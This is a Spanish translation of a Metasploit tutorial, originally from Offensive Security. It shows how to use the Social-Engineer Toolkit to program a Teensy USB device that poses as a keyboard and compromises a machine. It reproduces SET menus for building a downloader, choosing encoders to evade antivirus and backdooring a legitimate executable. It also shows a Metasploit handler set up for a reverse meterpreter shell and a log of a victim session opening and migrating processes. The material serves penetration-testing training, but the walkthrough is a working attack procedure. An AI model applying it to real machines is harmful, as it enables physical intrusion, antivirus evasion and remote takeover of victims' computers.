Ataque Teensy USB HID

De www.metasploit-es.com.ar

Vector de Ataque Teensy USB HID

El Vector de Ataque Teensy USB HID es una remarcable combinacion de hardware personalizado y puenteado de restricciones por emulacion de teclado. Tradicionalmente, cuando insertas un DVD/CD o USB con autorun deshabilitado, tu autorun.inf no es llamado, y no puedes ejecutar tu codigo automaticamente. Con el dispositivo basado en Teensy HID puedes emular un teclado y un raton. Cuando insertas el dispositivo sera detectado como un teclado, y con el microprocesador y el almacenamiento en memoria flash integrado puedes enviar muy rapidamente un conjunto de pulsaciones de tecla a la maquina y comprometerla completamente. Puedes pedir un dispositivo Teensy por aproximadamente 17 dolares US a http://www.prjc.com. Rapidamente despues de la charla de David Kennedy, Josh Kelley y Adrian Crewshaw sobre dispositivos Teensy, aparecio un hack de PS3 que utilizaba dispositivos Teensy, y actualmente se encuentran agotados en el momento de escribir este tutorial. Configuremos nuestros dispositivo Teensy para que realice una descargador WSCRIPT de un payload Metasploit. Lo que ocurrira aqui es que un pequeño archivo wscript se escribira, descargara un ejecutable y lo ejecutara. Este sera nuestro payload Metasploit, y todo se manejara desde el Social-Engineer Toolkit.

Select from the menu:

1.  Spear-Phishing Attack Vectors
2.  Website Attack Vectors
3.  Infectious Media Generator
4.  Create a Payload and Listener
5.  Mass Mailer Attack
6.  Teensy USB HID Attack Vector
7.  SMS Spoofing Attack Vector
8.  Third Party Modules
9.  Update the Metasploit Framework
10. Update the Social-Engineer Toolkit
11. Help, Credits, and About
12. Exit the Social-Engineer Toolkit

Enter your choice: 6

Welcome to the Teensy HID Attack Vector.

Special thanks to: IronGeek and WinFang

The Teensy HID Attack Vector utilizes the teensy USB device to
program the device to act as a keyboard. Teensy's have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.

You will need to purchase the Teensy USB device, it's roughly
$22 dollars. This attack vector will auto generate the code
needed in order to deploy the payload on the system for you.

This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.

For more information on specifications and good tutorials visit:

http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle

To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html

Select a payload to create the pde file to import into Arduino:

1. Powershell HTTP GET MSF Payload
2. WSCRIPT HTTP GET MSF Payload
3. Powershell based Reverse Shell
4. Return to the main menu.

Enter your choice: 2
Do you want to create a payload and listener yes or no: yes
What payload do you want to generate:

Name:                                      Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
9. Import your own executable              Specify a path for your own executable

Enter choice (hit enter for default):

Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.


[*] PDE file created. You can get it under 'reports/teensy.pde'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino
Press enter to continue.

[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...

Ahora que tenemos todos preparado, SET exportara un archivo llamado teensy.pde al directorio reports/. Copia ese directorio reports a donde tengas Arduino instalado. Con este ataque, sigue las instrucciones de PRJC sobre como cargar tu codigo a la placa Teensy; es relativamente simple: simplemente necesitas instalar el Teensy Loader y las librerias. Una vez hecho esto, dispondras de una interfaz IDE llamada Arduino. Uno de los aspectos MAS importantes de esto es asegurarse de que defines tu placa como Teclado/Raton Teensy USB.

Una vez tengas esto seleccionado, arrastra tu archivo pde a la interfaz Arduino. Arduino/Teensy soporta Linux, OSX y Windows. Inserta tu dispositivo USB en el pc y carga tu codigo. Esto programara tu dispositivo con el codigo generado por SET. A continuacion una muestra de la carga y el codigo.

Una vez insertado el dispositivo USB en la maquina victima nuestro codigo es ejecutado, y una vez acabado, se te deberia presentar una shell de meterpreter.

  [*] Sending stage (748544 bytes) to 172.16.32.131
  [*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:52:32 -0400 2010
  [*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f'
  [*] Current server process: java.exe (824)
  [*] Spawning a notepad.exe host process...
  [*] Migrating into process ID 3044
  [*] New server process: notepad.exe (3044)
  msf exploit(ms09_002_memory_corruption) >

• Generador de Medios Infecciosos
• Ataque SMS Spoofing

Original de www.offensive-security.com
Traducido por cbk999